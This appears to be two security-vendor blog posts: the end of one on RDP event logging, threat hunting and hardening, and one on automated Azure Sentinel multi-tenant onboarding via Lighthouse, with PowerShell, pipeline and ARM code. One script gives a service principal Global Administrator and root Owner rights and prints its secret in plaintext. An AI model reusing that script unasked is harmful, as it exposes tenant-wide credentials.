RDP logons or attacks will generate several log events in several event logs. These events will be found on the target systems that had RDP sessions attempted or completed, or on the Active Directory server that handled the authentication. These events would need to be collected into a log management or SIEM solution in order to create alerts for RDP behavior. There are also events on the source system that can be collected, but we will save that for another blog.

Being that multiple log sources contain RDP details, why collect more than one? The devil is in the details, and in the case of RDP artifacts, various events from different log sources can provide greater clarity of RDP activities. For investigations, the more logs, the better if malicious behavior is suspected.

Of course, organizations have to consider log management volume when ingesting new log sources, and many organizations do not collect workstation endpoint logs where RDP logs are generated. However, some of the logs specific to RDP will generally have a low quantity of events and are likely not to impact a log management volume or license. This is especially true because RDP logs are only found on the target system, and typically RDP is seldom used for workstations.

Generally, the more low noise/volume, high validity events you can collect from all endpoints into a log management solution, the better your malicious activity detection can be. An organization will need to test and decide which events to ingest based collectively on their environment, log management solution, and the impact on licensing and volume.

The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Audit Logon = Success and Failed

The following query logic can be used; these events contain a lot of detail about all authentication to a system, so this is a high volume event:

  • Event Log = Security
  • Event ID = 4624 (success)
  • Event ID = 4625 (failed)
  • Logon Type = 10 (RDP)
  • Account Name = The user name logging on
  • Workstation Name = Taken from the log of the system being logged on to
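Once these events are in a log pipeline, the RDP filter is just the event ID plus the logon type. A small sketch, using illustrative event dicts whose keys mirror the fields above:

```python
from collections import Counter

def rdp_logon_events(events):
    """Security-log logon events that arrived over RDP:
    Event ID 4624 (success) or 4625 (failed) with Logon Type 10."""
    return [e for e in events
            if e.get("EventID") in (4624, 4625) and e.get("LogonType") == 10]

def failed_rdp_by_source(events):
    """Count failed RDP logons (4625) per source IP -- a basic brute-force signal."""
    return Counter(e["IpAddress"] for e in rdp_logon_events(events)
                   if e["EventID"] == 4625)
```

A burst of 4625s with Logon Type 10 from a single source IP is the classic exposed-RDP brute-force pattern.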

Optionally, another audit policy can be enabled to collect RDP events, but this will also generate a lot of other logon noise. The Windows Advanced Audit Policy will need to have the following policy enabled to collect these events:

  • Logon/Logoff – Other Logon/Logoff Events = Success and Failed

The following query logic can be used; these events contain a few details about session authentication to a system, so this is a low volume event:

  • Event Log = Security
  • Event ID = 4778 (connect)
  • Event ID = 4779 (disconnect)
  • Account Name = The user name of the session being connected or disconnected
  • Session Name = RDP-Tcp#3
  • Client Name = This will be the system name of the source system making the RDP connection
  • Client Address = This will be the IP address of the source system making the RDP connection

There are also several RDP logs that will record valuable events that can be investigated during an incident to determine the source of the RDP login. Fortunately, the Windows Advanced Audit Policy will not need to be updated to collect these events, as they are on by default:

The following query logic can be used; these events contain a few details about RDP connections to a system, so this is a low volume event:

  • Event Log = Microsoft-Windows-TerminalServices-LocalSessionManager
  • Event ID = 21 (RDP connect)
  • Event ID = 24 (RDP disconnect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated
  • Message = The connection type

The nice thing about having these logs is that even if a threat actor clears the log before disconnecting, Event ID 24 (disconnect) is created after the logs have been cleared, when the user disconnects. This allows tracing of the path a user and/or threat actor took from system to system.

The following query logic can be used; these events contain a few details about RDP connections to a system, so this is a low volume event:

Event Log = Microsoft-Windows-TerminalServices-RemoteConnectionManager

  • Event ID = 1149 (RDP connect)
  • User = The user that made the RDP connection
  • Source Network Address = The system where the RDP connection originated

Event Log = Microsoft-Windows-TerminalServices-RDPClient

  • Event ID = 1024 (RDP connection attempt)
  • Event ID = 1102 (RDP connect)
  • Message = The system where the RDP connection originated

Threat Hunting

The event IDs previously mentioned would be a good place to start when hunting for RDP access. Since RDP logs are found on the target host, an organization will need to have a solution or way to check each workstation and server for these events in the appropriate log or use a log management SIEM solution to perform searches. Threat actors may clear one or more logs before disconnecting, but fortunately, the disconnect event will be in the logs allowing the investigator to see the source of the RDP disconnect. This disconnect (event ID 24) can be used to focus hunts on finding the initial access point of the RDP connection if the logs are cleared.
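A hunt over these events often amounts to ordering the connect/disconnect pairs into a per-host trail of who came from where. A sketch, with illustrative event dicts whose keys mirror the LocalSessionManager fields above:

```python
def rdp_trail(events):
    """Arrange LocalSessionManager events (21 = RDP connect, 24 = RDP
    disconnect) into a chronological trail of who connected from where."""
    actions = {21: "connect", 24: "disconnect"}
    return [(e["TimeCreated"], actions[e["EventID"]], e["User"],
             e["SourceNetworkAddress"])
            for e in sorted(events, key=lambda e: e["TimeCreated"])
            if e["EventID"] in actions]
```

Even if only the Event ID 24 records survive a log wipe, the trail still reveals the source address of each hop.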

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious RDP attempts is to remove RDP from being accessible from the internet.  NCC Group has investigated many incidents where our customers have had RDP open to the internet only to find that it was actively under attack without the client knowing it or the source of the compromise.  Knowing that RDP is highly vulnerable, as the Coveware report states, removing RDP from the internet, securing it, or finding another alternative is the highest recommendation NCC Group can make for organizations that need RDP for remote desktop functions.

Remote Desktop Gateway

Remote Desktop Gateway (RD Gateway) is a role added to a Windows Server and published to the internet, providing SSL-encrypted RDP (over ports TCP 443 and UDP 3391) instead of the RDP protocol over port 3389. The RD Gateway option is more secure than RDP alone, but should still be protected with MFA.

Virtual Private Network (VPN)

Another standard option to reduce malicious RDP attempts is to use RDP behind a VPN. If VPN infrastructure is already in place, organizations can easily adjust their firewalls to accommodate this. Organizations should also monitor VPN logins for access attempts, with source IPs resolved to their country of origin. Known good IP addresses for users can be implemented to reduce the noise of voluminous VPN access alerts and highlight anomalies.

Jump Host

Many organizations utilize jump hosts protected by MFA to authenticate before connecting to internal systems via RDP. However, keep in mind that jump hosts face the internet and are thus susceptible to flaws in the jump host application. Therefore, organizations should monitor the jump host application and apply patches as fast as possible.

Cloud RDP

Another option is to use a cloud environment like Microsoft Azure to host a remote solution that provides MFA to deliver trusted connections back to the organization.

Change the RDP Listening Port

Although not recommended as a way to prevent RDP attacks on its own, swapping the default port from 3389 to another port can be helpful from a detection standpoint. By editing the Windows registry, the default listening port can be modified, and organizations can implement a SIEM detection to capture port 3389 attempts. However, keep in mind that even though the port changes, recon scans can easily detect RDP listening on a given port, and an attacker can then change their port target.

IP Address restrictions

Lastly, organizations can use a dedicated firewall appliance or Windows Firewall on the host machines managed by Group Policy to restrict RDP connections to known good IP addresses. However, this option comes with a high administrative burden as more users are provisioned or travel for work. Nevertheless, this option is often the best short-term solution to secure RDP until one of the more robust solutions can be engineered and put in place.

Conclusion

Organizations should take careful consideration when utilizing RDP over the internet. We hope this blog entry helps provide options to reduce the risk of infection and compromise from ever-increasing attacks on RDP, as well as some things to consider when implementing and using RDP. 



Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments

By: Philipp Schaefer

NCC Group is offering a new fully Managed Detection and Response (MDR) service for our customers in Azure. This blog post gives a behind the scenes view of some of the automated processes involved in setting up new environments and managing custom analytics for each customer, including details about our scripting and automated build and release pipelines, which are deployed as infrastructure-as-code.

If you are:

  • a current or potential customer interested in how we manage our releases
  • just starting your journey into onboarding Sentinel for large multi-tenant environments
  • looking to enhance existing deployment mechanisms
  • interested in a way to manage multi-tenant deployments with varying set-ups

…you have come to the right place!

Background

Sentinel is Microsoft’s new Security Information and Event Management solution hosted entirely on Azure.

NCC Group has been providing MDR services for a number of years using Splunk and we are now adding Sentinel to the list.

The benefit of Sentinel over the Splunk offering is that you will be able to leverage existing Azure licenses, and all data will be collected and visible in your own Azure tenants.

The only bits we keep on our side are the custom analytics and data enrichment functions we write for analysing the data.

What you might learn

The solution covered in this article provides a possible way to create an enterprise scale solution that, once implemented, gives the following benefits:

  • Management of a large number of tenants with differing configurations and analytics
  • Minimal manual steps for onboarding new tenants
  • Development and source control of new custom analytics
  • Management of multiple tenants within one Sentinel instance
  • Zero downtime / parallel deployments of new analytics
  • Custom web portal to manage onboarding, analytics creation, baselining, and configuration of each individual tenant’s connectors and enabled analytics

The main components

Azure Sentinel

Sentinel is Microsoft’s cloud native SIEM (Security Information and Event Management) solution. It allows for gathering of a large number of log and event sources to be interrogated in real time, using in-built and custom KQL to automatically identify and respond to threats.

Lighthouse

“Azure Lighthouse enables multi-tenant management with scalability, higher automation, and enhanced governance across resources.”

In essence, it allows a master tenant direct access to one or many sub or customer tenants without the need to switch directory or create custom solutions.

Lighthouse is used in this solution to connect to log analytics workspaces in additional tenants and view them within the same instance of Sentinel in our “master tenant”.

Log Analytics Workspaces

Log Analytics workspaces are where the data from sources connected to Sentinel is stored in this scenario. We will connect workspaces from multiple tenants via Lighthouse to allow for cross-tenant analysis.

Azure DevOps (ADO)

Azure DevOps provides the core functionality for this solution used for both its CI/CD pipelines (Using YAML, not Classic for this) and inbuilt Git repos. The solutions provided will of course work if you decide to go for a different system.

App Service

To allow for easy management of configurations, onboarding and analytics development / baselining we hosted a small Web application written in Blazor, to avoid having to manually change JSON config files. The app also draws in MITRE and other additional data to enrich analytics.

Technologies breakdown:

In order for us to create and manage the required services, we need to make use of Infrastructure as Code (IaC), scripting, and automated build and release pipelines, as well as have a way to develop a management portal.

The technologies we ended up using for this were:

  • ARM Templates for general resource deployments and some of the connectors
  • PowerShell using Microsoft AZ / Sentinel and Roberto Rodriguez’s Azure-Sentinel2Go
  • API calls for baselining and connectors not available through PowerShell modules
  • Blazor for configuration portal development
  • C# for API backend Azure function development
  • YAML Azure DevOps Pipelines

Phase 1: Tenant Onboarding

Let’s step through this diagram.

We are going to have a portal that allows us to configure a new client, go through an approval step to ensure configs are peer reviewed before going into production, by pushing the configuration into a new branch in source control, then trigger a Deployment pipeline.

The pipeline triggers 2 Tenant deployments.

Tenant A is our “Master tenant” that will hold the main Sentinel, all custom analytics, alerts, and playbooks and connect, using lighthouse, to all “Sub tenants” (Tenant B).

In large organisations we would create a 1:1 mapping for each sub tenant by deploying additional workspaces that then point to the individual tenants. This has the benefit of keeping the analytics centralised, protecting intellectual property. You could, however, deploy them directly into the actual workspaces once Lighthouse is set up, or have one workspace that queries all the others.

Tenant B and all other additional Tenants have their own instance of Sentinel with all required connectors enabled and need to have the lighthouse connection initiated from that side.

Pre-requisites:

To be able to deploy to either of the tenants we need Service connections for Azure DevOps to be in place.

“Sub tenant” deployment:

Some of the Sentinel Connectors need pretty extreme permissions to be enabled; for example, to configure the Active Directory connector properly we need the Global Administrator and Security Administrator roles, as well as root scope Owner permissions on the tenant.

In most cases, once the initial set up of the “sub tenant” is done there will rarely be a need to add additional connectors or deploy to that tenant, as all analytics are created on the “Master tenant”. I would strongly suggest either to disable or completely remove the Tenant B service connection after setup. If you are planning to regularly change connectors and are happy with the risk of leaving this service principal in place, then the steps will allow you to do this.

A sample script for setting up the “Sub tenant” service principal:

$rgName = 'resourceGroupName' ## set the value of this to the resource group name containing the sentinel log analytics workspace
Connect-AzAccount
$cont = Get-AzContext
Connect-AzureAD -TenantId $cont.Tenant
 
$sp = New-AzADServicePrincipal -DisplayName ADOServicePrincipalName

Sleep 20
$assignment =  New-AzRoleAssignment -RoleDefinitionName Owner -Scope '/' -ServicePrincipalName $sp.ApplicationId -ErrorAction SilentlyContinue
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)/resourceGroups/$($rgName)" -ServicePrincipalName $sp.ApplicationId
New-AzRoleAssignment -RoleDefinitionName Owner -Scope "/subscriptions/$($cont.Subscription.Id)" -ServicePrincipalName $sp.ApplicationId

$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sp.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$roles = Get-AzureADDirectoryRole | Where-Object {$_.displayName -in ("Global Administrator","Security Administrator")}
foreach($role in $roles)
{
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.Id
}
$activeDirectorySettingsPermissions = ($null -ne $assignment)
$sp | select @{Name = 'Secret'; Expression = {$UnsecureSecret}},@{Name = 'tenant'; Expression = {$cont.Tenant}},@{Name = 'Active Directory Settings Permissions'; Expression = {$activeDirectorySettingsPermissions}},@{Name = 'sub'; Expression = {$cont.Subscription}}, applicationId, Id, DisplayName

This script will:

  1. create a new Service Principal,
  2. set the Global Administrator and Security Administrator roles for the principal,
  3. attempt to give root scope Owner permissions, with subscription scope Owner as a backup, since the latter is the minimum required to connect Lighthouse if the root scope permissions cannot be set.

The end of the script prints out the details required to set this up as a Service connection in Azure DevOps. You could of course continue on to add the Service connection directly to Azure DevOps if the person running the script has access to both, but it was not feasible for my requirements.

For Tenant A we have 2 options.

Option 1: One Active Directory group to rule them all

This is something you might do if you are setting things up for your own multi-tenant environments. If you have multiple environments to manage and different analysts’ access for each, I would strongly suggest using option 2.

Create an empty Azure Active Directory group either manually or using

(New-AzADGroup -DisplayName 'GroupName' -MailNickname 'none').Id
(Get-AzTenant).Id

You will need the ID of both the Group and the tenant in a second so don’t lose it just yet.

Once the group is created, set up a Service Connection to your Master tenant from Azure DevOps (just use the normal connection Wizard), then add the Service Principal to the newly created group as well as users you want to have access to the Sentinel (log analytics) workspaces.

To match the additional steps in Option 2, create a Variable group (either directly but masked or connected to a KeyVault depending on your preference) in Azure DevOps (Pipelines->Library->+Variable Group)

Make sure you restrict both Security and Pipeline permissions for the variable group to only be usable for the appropriate pipelines and users whenever creating variable groups.

Then Add:

AAdGroupID with your new Group ID

And

TenantID with the Tenant ID of the master tenant.

Then reference the Group at the top of your YAML pipeline within the Job section with

variables:
  - group: YourGroupName

Option 2: One group per “Sub tenant”

If you are managing customers, this is a much better way to handle things. You will be able to assign different users to the groups to ensure only the correct people have access to the environments they are meant to have.

However, to be able to do this you need a Service Connection with some additional rights in your “Master Tenant”, so your pipelines can automatically create customer specific AD groups and add the Service principal to them.

Set up a Service Connection from Azure DevOps to your Master Tenant, then find the Service Principal and give it the following permissions

  • Azure Active Directory Graph
    • Directory.ReadWrite.All
  • Microsoft Graph
    • Directory.ReadWrite.All
    • PrivilegedAccess.ReadWrite.AzureADGroup

Then include the following script in your pipeline to create the group for each customer and add the service principal to it.

param(
    [string]$AADgroupName,
    [string]$ADOServicePrincipalName
)
$group1 = Get-AzADGroup -DisplayName $AADgroupName -ErrorAction SilentlyContinue
if (-not $group1) {
    $guid1 = New-Guid
    $group1 = New-AzADGroup -DisplayName $AADgroupName -MailNickname $guid1 -Description $AADgroupName
    $spID = (Get-AzADServicePrincipal -DisplayName $ADOServicePrincipalName).Id
    Add-AzADGroupMember -MemberObjectId $spID -TargetGroupObjectId $group1.Id
}
$id = $group1.Id
$tenant = (Get-AzTenant).Id
Write-Host "##vso[task.setvariable variable=AAdGroupId;isOutput=true]$($id)"
Write-Host "##vso[task.setvariable variable=TenantId;isOutput=true]$($tenant)"

The Write-Host calls at the end of the script output the group and tenant IDs back to the pipeline, to be used when setting up Lighthouse later.

With the boring bits out of the way, let’s get into the core of things.

Client configurations

First, we need to create configuration files to be able to manage the connectors and analytics that get deployed for each “Sub tenant”.

You can of course do this manually, but I opted to go for a slightly more user-friendly approach with the Blazor App.

The main bits we need, highlighted in yellow above are:

  • A name for the config
  • The Azure DevOps Service Connection name for the target Sub tenant,
  • Azure Region (if you are planning to deploy to multiple regions),
  • Target Resource Group and Target Workspace: this is either where the Log Analytics workspace of your target environment already exists or where it should be created.

Client config Schema:

    public class ClientConfig
    {
        public string ClientName { set; get; } = "";
        public string ServiceConnection { set; get; } = "";
        public List<Alert> SentinelAlerts { set; get; } = new List<Alert>();
        public List<Search> SavedSearches { set; get; } = new List<Search>();
        public string TargetWorkspaceName { set; get; } = "";
        public string TargetResourceGroup { set; get; } = "";
        public string Location { get; set; } = "UK South";
        public string connectors { get; set; } = "";
    }

Sample Config output:

{
    "ClientName": "TenantB",
    "ServiceConnection": "ServiceConnectionName",
    "SentinelAlerts": [
        {
            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}
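Before a config like this is committed, it is worth sanity-checking the fields the pipeline relies on. A minimal sketch of loading and validating one (field names taken from the `ClientConfig` schema above; the helper itself is illustrative):

```python
import json

# Fields the deployment pipeline cannot proceed without.
REQUIRED_FIELDS = ("ClientName", "ServiceConnection", "TargetWorkspaceName",
                   "TargetResourceGroup", "Location", "connectors")

def load_client_config(text: str) -> dict:
    """Parse a client config and check the fields the pipeline relies on."""
    config = json.loads(text)
    missing = [f for f in REQUIRED_FIELDS if not config.get(f)]
    if missing:
        raise ValueError(f"config is missing required fields: {missing}")
    # 'connectors' is a comma-separated string in the schema; split it for use.
    config["connectors"] = [c.strip() for c in config["connectors"].split(",")]
    return config
```

Failing fast here means a malformed config is rejected at review time rather than mid-deployment.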

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
  vmImage: 'windows-latest'

steps:
- checkout: self
  persistCredentials: true
  clean: true

- task: AzurePowerShell@5
  displayName: 'Export Configs'
  inputs:
    azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: PowerShell@2
  displayName: 'Commit Changes to new Git Branch'
  inputs:
    filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExport.ps1 is:

param(
    [string]$ResourceGroupName,
    [string]$storageName,
    [string]$outPath,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $storageName).Context
$blobs  = Get-AzStorageBlob -Container $container -Context $ctx

if(-not (Test-Path -Path $outPath))
{
New-Item -ItemType directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -force -recurse
foreach($file in $blobs)
{
Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name  -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
[string] $branchName
)
git --version
git switch -c $branchName
git add -A
git config user.email [email protected]
git config user.name "Automated Build"
git commit -a -m "Commiting rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
    [string]$resourceGroupName,
    [string]$workspaceName,
    [string]$outPath,
    [string]$module = 'Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
Import-Module $module

Install-Module -Name Az.Accounts -AllowClobber -Force
Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results = Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach ($temp in $results) {
    if ($temp.DisplayName -and $temp.query) {
        if ($temp.query.Contains($workspaceName)) {
            $temp.query = $temp.query -replace $workspaceName, '{{targetWorkspace}}'
            $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
            if (-not (Test-Path -Path $myExportPath)) {
                New-Item -ItemType Directory -Force -Path $myExportPath
            }
            $rule = $temp | ConvertTo-Json
            $resultName = Remove-InvalidFileNameChars -Name $temp.DisplayName
            $folder = "$($myExportPath)$($resultName)$($myExtension)"
            $properties = [pscustomobject]@{DisplayName = ($temp.DisplayName); RuleName = $resultName; Category = ($temp.productFilter); Path = $myExportPath}
            $output += $properties
            $rule | Out-File $folder -Force
        }
    }
}

Note the -replace $workspaceName, ‘{{targetWorkspace}}’. This replaces the actual workspace name used in our test environments, i.e. workspace(‘testworkspaceName’), with workspace(‘{{targetWorkspace}}’), allowing us to substitute the actual “Sub tenant’s” workspace name at deployment time.
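At deployment time the substitution is just a per-tenant string replacement over the exported KQL. A minimal sketch (the function name is illustrative):

```python
def retarget_query(query: str, target_workspace: str) -> str:
    """Point an exported analytic's KQL at a specific sub tenant workspace."""
    return query.replace("{{targetWorkspace}}", target_workspace)
```

Running this over each exported rule before submission yields analytics bound to the correct sub tenant workspace.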

  2. Create your own analytics in a custom portal. For the Blazor Portal, I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName":  null,
    "DisplayName":  "{DisplayPrefix}{DisplayName}",
    "Description":  "{Description}",
    "Enabled":  true,
    "LastModifiedUtc":  "\/Date(1619707105808)\/",
    "Query":  "{query}",
    "QueryFrequency":  {
                           "Ticks":  9000000000,
                           "Days":  0,
                           "Hours":  0,
                           "Milliseconds":  0,
                           "Minutes":  15,
                           "Seconds":  0,
                           "TotalDays":  0.010416666666666666,
                           "TotalHours":  0.25,
                           "TotalMilliseconds":  900000,
                           "TotalMinutes":  15,
                           "TotalSeconds":  900
                       },
    "QueryPeriod":  {
                        "Ticks":  9000000000,
                        "Days":  0,
                        "Hours":  0,
                        "Milliseconds":  0,
                        "Minutes":  15,
                        "Seconds":  0,
                        "TotalDays":  0.010416666666666666,
                        "TotalHours":  0.25,
                        "TotalMilliseconds":  900000,
                        "TotalMinutes":  15,
                        "TotalSeconds":  900
                    },
    "Severity":  "{Severity}",
    "SuppressionDuration":  {
                                "Ticks":  180000000000,
                                "Days":  0,
                                "Hours":  5,
                                "Milliseconds":  0,
                                "Minutes":  0,
                                "Seconds":  0,
                                "TotalDays":  0.20833333333333331,
                                "TotalHours":  5,
                                "TotalMilliseconds":  18000000,
                                "TotalMinutes":  300,
                                "TotalSeconds":  18000
                            },
    "SuppressionEnabled":  false,
    "TriggerOperator":  0,
    "TriggerThreshold":  0,
    "Tactics":  [
                    "DefenseEvasion"
                ],
    "Id":  "{alertRuleID}",
    "Name":  "{alertRuleguid}",
    "Type":  "Microsoft.SecurityInsights/alertRules",
    "Kind":  "Scheduled"
}

Let’s Lighthouse this up!

Now that we have the service connections and initial client config in place, we can start building the Onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generating consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required Connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways for getting naming conventions done.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
    [string]$location,
    [string]$environment,
    [string]$customerIdentifier,
    [string]$instance
)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: PowerShell@2
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: AzurePowerShell@5
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.CustomerResourceGroup)" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log Analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM; however, in the actual solution I am doing a lot of additional tasks with the workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
    [string]$resourceGroupName,
    [string]$workspaceName,
    [string]$Location,
    [string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws){
$ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
[string]$resourceGroupName,
[string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

$solutions = Get-AzOperationalInsightsIntelligencePack -ResourceGroupName $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
    Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
}
else {
    Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
}

Setting up Lighthouse to the Master tenant

param(
[string]$customerConfig='',
[string]$templateFile = '',
[string]$templateParameterFile='',
[string]$AadGroupID='',
[string]$tenantId=''
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId" 

This script takes in the config file we generated earlier to read out the client / sub tenant values for the location and the resource group in the sub tenant, then sets up Lighthouse with the below ARM template / parameter file after replacing the '{principalId}' placeholder in the parameter file with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted by the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the sub tenant, you can add and change the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
        "mspOfferName": { "type": "string" },
        "mspOfferDescription": { "type": "string" },
        "managedByTenantId": { "type": "string" },
        "authorizations": { "type": "array" },
        "rgName": { "type": "string" }
    },
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"
    },
    "resources": [
        {
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }
        },
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
            ],
            "properties": {
                "mode": "Incremental",
                "template": {
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
                            }
